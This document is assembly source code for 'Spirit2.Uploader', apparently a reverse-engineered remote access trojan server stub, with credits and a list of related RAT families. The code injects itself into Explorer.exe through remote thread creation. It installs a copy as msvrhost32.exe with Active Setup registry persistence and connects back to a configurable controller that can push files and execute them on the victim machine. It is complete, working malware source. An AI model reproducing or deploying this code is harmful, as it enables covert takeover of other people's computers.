Spirit2.Uploader Coder

;===============================================;    Spirit2.Uploader Coder:Anskya;    Email: Anskya@Gmail.com;;    Spirit2.Uploader.code:100%(Server)-------code inject;    Spirit3.b1.Uploader.code:100%(Server)----up;    Spirit3.b2.Uploader.code:100%(Server)----up;    Spirit4.Uploader.b1.code:100%(Server)----up;    C-One 1.0.0.0.code:100%(Server----shit!)-code inject(no elirt);    Bifrost.1.102.code:100%(Server)----------dll (memory pe loader) inject(use elirt)+plugin memory loader;    Poison Ivy 2.0.0-2.14:100%(Server)-------code inject(no use elict)-code plugin;    tequila bandita 1.3b2.code:100%(Server)--dll Memory Inject;    Nuclear Seed 1.1.code:100%(Server+Client)----process hjeck;;    Bifrost.1.21.code:30%(Server)------------dll (memory pe loader) inject(use elirt);    Flux.1.01.code:70%(Server)---------------code inject(use elirt)-code plugin;    Poison Ivy 2.20-2.30.code:10%(Server)----code inject(no use elict)-code plugin;;    Thank:drocon,coban2k,iciko,ksv,Gargamel,shapeless,Caecigenus,stm;       ;    完全原版逆向...编译器:Nasm 0.39.38 or Yasm 0.61;    nasmw -fbin Spirit2a.asm -o Spirit2a.exe;===============================================[BITS 32]%define        CODE_BASE    1000h%define    DATA_BASE      CODE_BASE   %define        RVADIFF        1000h-200h%define        imagebase      00400000h%define          reloc        RVADIFF+imagebase%define        MAX_PATH    260MZ_Header:.magic                  dw "MZ".cblp                    dw 0.cp                        dw "IC".crlc                    dw "IK".cparhdr                dw "O".minalloc                dw    0;.cblp                  dw "[C";.cp                    dw "]A";.crlc                  dw "ns";.cparhdr                dw "ky";.minalloc              dw "a"PE_Header:.Signature              dd "PE".Machine                dw 14Ch.NumberOfSections      dw 1IAT_User32:.TimeDateStamp          dd 0.PointerToSymbolTable  dd 0.NumberOfSymbols        dd 0.SizeOfOptionalHeader  dw 0E0h.Characteristics        dw 
103hOptional_Header:.Magic                  dw 10Bh                   .MajorLinkerVersion    db 0.MinorLinkerVersion    db 0.SizeOfCode            dd CODE_BASE.SizeOfInitializedData  dd 0.SizeOfUninitialzedData dd 0.AddressOfEntryPoint    dd code+RVADIFF.BaseOfCode            dd 1000h;.BaseOfData            dd DATA_BASE.lfanew                dd 0Ch;align 16, DB 0                       .ImageBase              dd imagebase.SectionAlignment      dd 1000h   .FileAlignment          dd 200h.MajorOperSystemVersion dw 4h.MinorOperSystemVersion dw 0h.MajorImageVersion      dw 0h.MinorImageVersion      dw 0h.MajorSubsystemVersion  dw 4.MinorSubsystemVersion  dw 0.Reserved1              dd 0h.SizeOfImage            dd 2000h.SizeOfHeaders          dd import.CheckSum              dd 0h.Subsystem              dw 2.DllCharacteristics    dw 0h.SizeOfStackReserve1    dd 100000h.SizeOfStackCommit1    dd 2000h.SizeOfStackReserve2    dd 100000h.SizeOfStackCommit2    dd 1000h.LoaderFlags            dd 0h.NumberOfRvaAndSizes    dd 10hData_Directories:.Export        times 2 dd 0h.Import                dd import+RVADIFF, import_end-import.Resource        times 2 dd 0.Exception        times 2 dd 0h.Security        times 2 dd 0h.Relocation        times 2 dd 0h.Debug            times 2 dd 0h.Architecture    times 2 dd 0h.GlobalPtr        times 2 dd 0h.TLS            times 2 dd 0h.LoadConfig        times 2 dd 0h.BoundImport    times 2 dd 0h.IAT            times 2 dd 0h.DelayImport    times 2 dd 0h.ComDescriptor    times 2 dd 0h.Reserved        times 2 dd 0h;PE节----至少要有一个PE节sections:.SectionName            db "spirit2",0.VirtualSize            dd 1000h.VirtualAddress        dd 1000h.SizeOfRawData          dd code_end-import.PointerToRawData      dd import.PointerToRelocations  dd 0h.PointerToLinenumbers  dd 0h.NumberOfRelocations    dw 0h.NumberOfLinenumbers    dw 0h.Characteristics        dd 
0E00000D0h;============================================================================================;    循环启动自身.查找ExplorerFind_Process:    push    11h    pop        ecx@loop_push1:    push    edi    loop    @loop_push1       push    esp    push    esp    push    7    pop        ecx@loop_push2:    push    edi    loop    @loop_push2       lea        eax, [reloc + __GetCurrentPath]    push    eax    call    [reloc + __CreateProcessA]       push    11h    pop        ecx@loop_pop:    pop        eax    loop    @loop_pop       popad    retn   ;    Win9x插入函数Inject_Win9x:    push    40h    push    08003000h    push    ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2)    push    edi    call    [reloc + __VirtualAlloc]       ;    Write Memory       push    8    push    edi    push    eax    push    edi    push    ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH)    lea        edx, [reloc + __RemoteCodeStart]    push    edx    push    eax    push    esi    call    [reloc + __WriteProcessMemory]   ;    CreateRemoteThread For Win9x    call    [reloc + __GetCurrentProcessId]    xor        eax, [fs:030h]    xor        ebx, eax    mov        esi, [reloc + __DebugActiveProcess];    搜索CreateRemoteThread9x@search_crt9x:    inc        esi    cmp        dword [esi], 0E857FFFFh    jnz        @search_crt9x       lodsd    lodsd    add        eax, esi    push    -1000h    push    ebx    call    eax;    搜索OpenThread9x    push    edi    push    eax    mov        esi, [reloc + __OpenProcess]@search_opt9x:    inc        esi    cmp        dword [esi], 0E832FF50h    jnz        @search_opt9x    lodsd    lodsd    add        eax, esi    push    ebx    call    eax    popad    retndll002                    db "USER32",0__ExplorerWindow        db 'shell_traywnd',0align 200h, DB 0import    dd 0        dd 0        dd -1        dd dll001+RVADIFF        dd api001+RVADIFFtimes 5 dd 0                ;NULL DLL ENTRY       dll001    db "KERNEL32.DLL",0;kernel32 apisapi001    dd api101+RVADIFF        
dd 0       api101    dw 0        db "ExitProcess",0       import_end:code:    pushad       lea        ebx, [reloc + __LoadLibraryA]    call    GetKernel32       lea        eax, [imagebase + dll002]    push    eax    call    [reloc + __LoadLibraryA]    call    GetFunctions       xor        edi, edi    ;    获取自身路径    push    MAX_PATH    lea        eax, [reloc + __GetCurrentPath]    push    eax    push    edi    call    [reloc + __GetModuleFileNameA]       push    1024    call    [reloc + __Sleep]       ;Debug    ;call    RemoteCode       ;    查找Explorer.exe窗口    push    edi    lea        eax, [imagebase + __ExplorerWindow]    push    eax    call    [reloc + __FindWindowA]    test    eax, eax    jnz        @Inject_Process          ;    启动自身,再次查找Exlorer窗口    lea        eax, [imagebase + Find_Process]    jmp        eax;    注入代码To 远程进程(Explorer)@Inject_Process:    push    eax    push    esp    push    eax    call    [reloc + __GetWindowThreadProcessId]    pop        eax    xchg    eax, ebx       push    ebx    push    edi    push    01F0FFFh    call    [reloc + __OpenProcess]    xchg    eax, esi       ;    判断是否为Win9x    call    [reloc + __GetVersion]    cmp        eax, 080000000h    jb        @Inject_WinNT       ;    执行Win9x插入    lea        eax, [imagebase + Inject_Win9x]    jmp        eax   @Inject_WinNT:    push    40h    push    3000h    push    ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2)    push    edi    push    esi    call    [reloc + __VirtualAllocEx]       push    eax    push    esp    push    edi    push    edi    push    eax    push    edi    push    ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH)    lea        ebx, [reloc + __RemoteCodeStart]    push    ebx    push    eax    push    esi    call    [reloc + __WriteProcessMemory]       push    edi    push    edi    push    esi    call    [reloc + __CreateRemoteThread]    pop        eax       popad    retn;=============================================;    RemoteCode__RemoteCodeStart:RemoteCode:    
pushad    call    @Start@Start:    pop        ebx    add        ebx, (__LoadLibraryA - @Start)       ;    Load WS2_32    push    '32'    push    'ws2_'    push    esp    call    [ebx + (__LoadLibraryA - __LoadLibraryA)]        ;    LoadLibraryA    call    GetFunctions       ;    Load Advapi32    push    0    push    'pi32'    push    'adva'    push    esp    call    [ebx + (__LoadLibraryA - __LoadLibraryA)]        ;    LoadLibraryA    call    GetFunctions          push    5    pop        ecx@@Loop_Pop:    pop        eax    loop    @@Loop_Pop;    安装文件    ;    获取安装目录    push    MAX_PATH    lea        edi, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH]    push    edi    call    [ebx + (__GetSystemDirectoryA - __LoadLibraryA)]       push    edi    add        edi, eax    lea        esi, [ebx + (__SetupFileName - __LoadLibraryA)]       ;    连接文件名    push    15    pop        ecx    rep        movsb    pop        edi       ;    删除已经存在的安装文件;    push    edi;    call    [ebx + (__DeleteFileA - __LoadLibraryA)];       ;    Copy File    push    0    push    edi    lea        eax, [ebx + (__GetCurrentPath - __LoadLibraryA)]    push    eax    call    [ebx + (__CopyFileA - __LoadLibraryA)]   ;    填写注册表    ;    打开键值    push    esi    lea        eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]    push    eax    push    080000002h    call    [ebx + (__RegCreateKeyA - __LoadLibraryA)]   ;    ;    填写键值    push    0b4h    push    edi    push    1    push    0    lea        eax, [ebx + (__ActiveSetup - __LoadLibraryA)]    push    eax    push    dword [esi]    call    [ebx + (__RegSetValueExA - __LoadLibraryA)]       ;    关闭句柄    push    dword [esi]    call    [ebx + (__RegCloseKey - __LoadLibraryA)];    创建Socket连接    ;WSAStartup    sub        esp, 0800h    mov        edi, esp    push    edi    push    1    call    [ebx + (__WSAStartup - __LoadLibraryA)]@Loop_Online:    ;closesocket    push    ebp    call    [ebx + (__closesocket - __LoadLibraryA)]       ;socket    push    6    
push    1    push    2    call    [ebx + (__socket - __LoadLibraryA)]       ;    删除注册表    xchg    eax, ebp    lea        eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]    push    eax    push    080000001h    call    [ebx + (__RegDeleteKeyA - __LoadLibraryA)]@Loop_connect:    ;Sleep    push    0800h    call    [ebx + (__Sleep - __LoadLibraryA)];    终于可以连接了    lea        eax, [ebx + (__MasterAddress - __LoadLibraryA)]    push    eax    call    [ebx + (__gethostbyname - __LoadLibraryA)]    test    eax, eax    je        @Loop_connect       ;    压入端口开始连接    mov        eax, dword [eax + 0ch]    mov        eax, dword [eax]    push    dword [eax]    push    0FE120002h                ;端口值---使用htons转换后的数值--写生成器时注意    pop        dword [edi]    pop        dword [edi + 4]       ;connect    push    010h    push    edi    push    ebp    call    [ebx + (__connect - __LoadLibraryA)]    jnz        @Loop_Online    push    0       ;GetComputerNameA    push    010h    push    esp    push    edi    call    [ebx + (__GetComputerNameA - __LoadLibraryA)]    jmp        short @Send_OnlineInfo   ;    循环接受数据包@Recv_Buffer:    push    0    push    0800h    push    edi    push    ebp    call    [ebx + (__recv - __LoadLibraryA)]    inc        eax    je        @Loop_Online    dec        eax    je        @Loop_Online       mov        dh, byte [edi]    inc        edi    call    @Create_File    dec        edi       ;    数据发送函数@Send_Buffer:    push    0    push    2@Send_OnlineInfo:    push    edi    push    ebp    call    [ebx + (__send - __LoadLibraryA)]@Send_Loop:    jmp        short @Recv_Buffer    ;    解析接受到的命令----看表头注明函数功能@Parse_Cmd:@Parse_Done:    mov        byte [edi], 78h    retn   @Create_File:    dec        dh    jnz        @Wirte_File       xor        ecx, ecx    push    ecx    push    ecx    push    2    push    ecx    push    ecx    push    040000000h    push    edi    call    [ebx + (__CreateFileA - __LoadLibraryA)]    inc        eax    je        @Parse_Done    dec        eax    xchg    
eax, esi    retn@Wirte_File:    dec        dh    jnz        @Close_File    dec        eax       push    0    push    ecx    push    eax    push    edi    push    esi    call    [ebx + (__WriteFile - __LoadLibraryA)]    test    eax, eax    je        @Parse_Done    retn@Close_File:    dec        dh    jnz        @Parse_UnInstall       push    esi    call    [ebx + (__CloseHandle - __LoadLibraryA)]@Execute_File:    push    0Ah    push    edi    call    [ebx + (__WinExec - __LoadLibraryA)]    cmp        eax, 31    jns        @Parse_Done    retn@Parse_UnInstall:    dec        dh    jnz        @Close_Socket    ;    删除注册表    lea        eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]    push    eax    push    080000002h    call    [ebx + (__RegDeleteKeyA - __LoadLibraryA)]    ;    删除安装文件    lea        eax, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH]    push    eax    call    [ebx + (__DeleteFileA - __LoadLibraryA)]    jmp        @Close_SocketProc@Close_Socket:    dec        dh    jnz        @Parse_Ping@Close_SocketProc:    push    ebp    call    [ebx + (__closesocket - __LoadLibraryA)]    pop        eax   ;    exit@Exit_Loop:    add        esp, 0800h    popad    retn@Parse_Ping:    dec        dh    jnz        @Parse_Is9x    mov        byte [edi], 32h    ret   @Parse_Is9x:    dec        dh    jnz        @Parse_Exit       call    [ebx + (__GetVersion - __LoadLibraryA)]    cmp        eax, 080000000h    jnb        @Parse_Exit    inc        byte [edi]   @Parse_Exit:    retn      ;=============================================   ;    get kernel32 baseGetKernel32:    mov        eax, [fs:30h]    test    eax, eax    js        @@os_9x   @@os_nt:    mov        eax, [eax + 0ch]    mov        esi, [eax + 1ch]    lodsd     mov        eax, [eax + 08h]    jmp        short @@finished   @@os_9x:       mov        eax, [eax+034h]    mov        eax, [eax+0b8h]   @@finished:    ;retn;    HashGetProcAddress thank coban2kGetFunctions:    xchg    eax, ebp    mov    eax, dword [ebp+03Ch]  
      ; PE    mov    eax, dword [ebp+eax+078h]    ; Export Table RVA     lea    esi, [ebp+eax+018h]            ; Export Table VA+18h    lodsd    xchg    eax, ecx                    ; NumberOfNames    lodsd                                ; AddressOfFunctions    push    eax    lodsd                                ; AddressOfNames    add    eax, ebp    xchg    eax, edx    lodsd                                ; AddressOfNameOrdinals    add    eax, ebp    push    eax    xchg    esi, edx @next_func:    lodsd    add        eax, ebp    xor        edx, edx   @calc_hash:    rol        edx, 3    xor        dl,    byte [eax]    inc        eax    cmp        byte [eax], 0    jnz        @calc_hash       mov        edi, ebx   @scan_dw_funcs:    cmp        dword [edi], edx    jnz        @Skip_function    mov        eax, dword [esp]    movzx    eax, word [eax]    shl        eax, 2    add        eax, dword [esp+4]    mov        eax, dword [eax+ebp]    add        eax, ebp    stosd@Skip_function:    scasd       cmp        dword [edi], 0    jnz        @scan_dw_funcs       add        dword [esp], 2    loop    @next_func    pop        eax    pop        eax    ret   ;    =======API Hash Address__FunAddress:    __LoadLibraryA    dd                        0A412FD89h    __WinExec        dd                        0016EF74Bh    __CreateProcessA dd                        08EF94368h    __Sleep dd                                00005F218h    __DeleteFileA dd                        049462A7Bh    __GetModuleFileNameA dd                    060F43F1Bh    __GetSystemDirectoryA dd                0B8E579C1h    __CopyFileA dd                            04F182A69h    __CreateFileA dd                        038C62A7Ah    __WriteFile dd                            058D8C545h    __CloseHandle dd                        0C0D6D616h    __closesocket dd                        0C0CBAF87h    __connect dd                            001BDA62Ch    __gethostbyname dd                        0208651E9h    __send dd         
                       00000FC54h    __socket dd                                0003FAF9Ch    __recv dd                                00000FE2Eh    __WSAStartup dd                            0E250EADAh    __RegSetValueExA dd                        09775A748h    __RegCreateKeyA dd                        0A718D938h    __RegDeleteKeyA dd                        08928D938h    __RegCloseKey dd                        0C6E06B86h    __GetComputerNameA dd                    0BA2070DFh    __GetVersion dd                            052ED5F54h    __FindWindowA dd                        0ABEEB02Bh    __GetWindowThreadProcessId dd            0850BA256h       __OpenProcess dd                        029BF2CBBh    __VirtualAllocEx dd                        0C5B429FAh    __WriteProcessMemory dd                    0B04AD555h    __CreateRemoteThread dd                    04A5F66C2h       __DebugActiveProcess dd                    031978FE3h    __GetCurrentProcessId dd                06D5EA21Eh    __VirtualAlloc dd                        0AB16D0AEh__ActiveSetup    db 'StubPath',0;__MasterPort    dd 0FE120002h__MasterAddress    db '127.0.0.1',0                db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0__ActiveRegedir    db 'SOFTWARE/Microsoft/Active Setup/Installed Components/'__ActiveRegHex    db '{2A202488-F02D-11cf-64CD-1123AFEECF20}',0__SetupFileName    db '/msvrhost32.exe',0__GetCurrentPath:__RemoteCodeEnd:%define RemoteCodeSize $ - RemoteCodecode_end:
 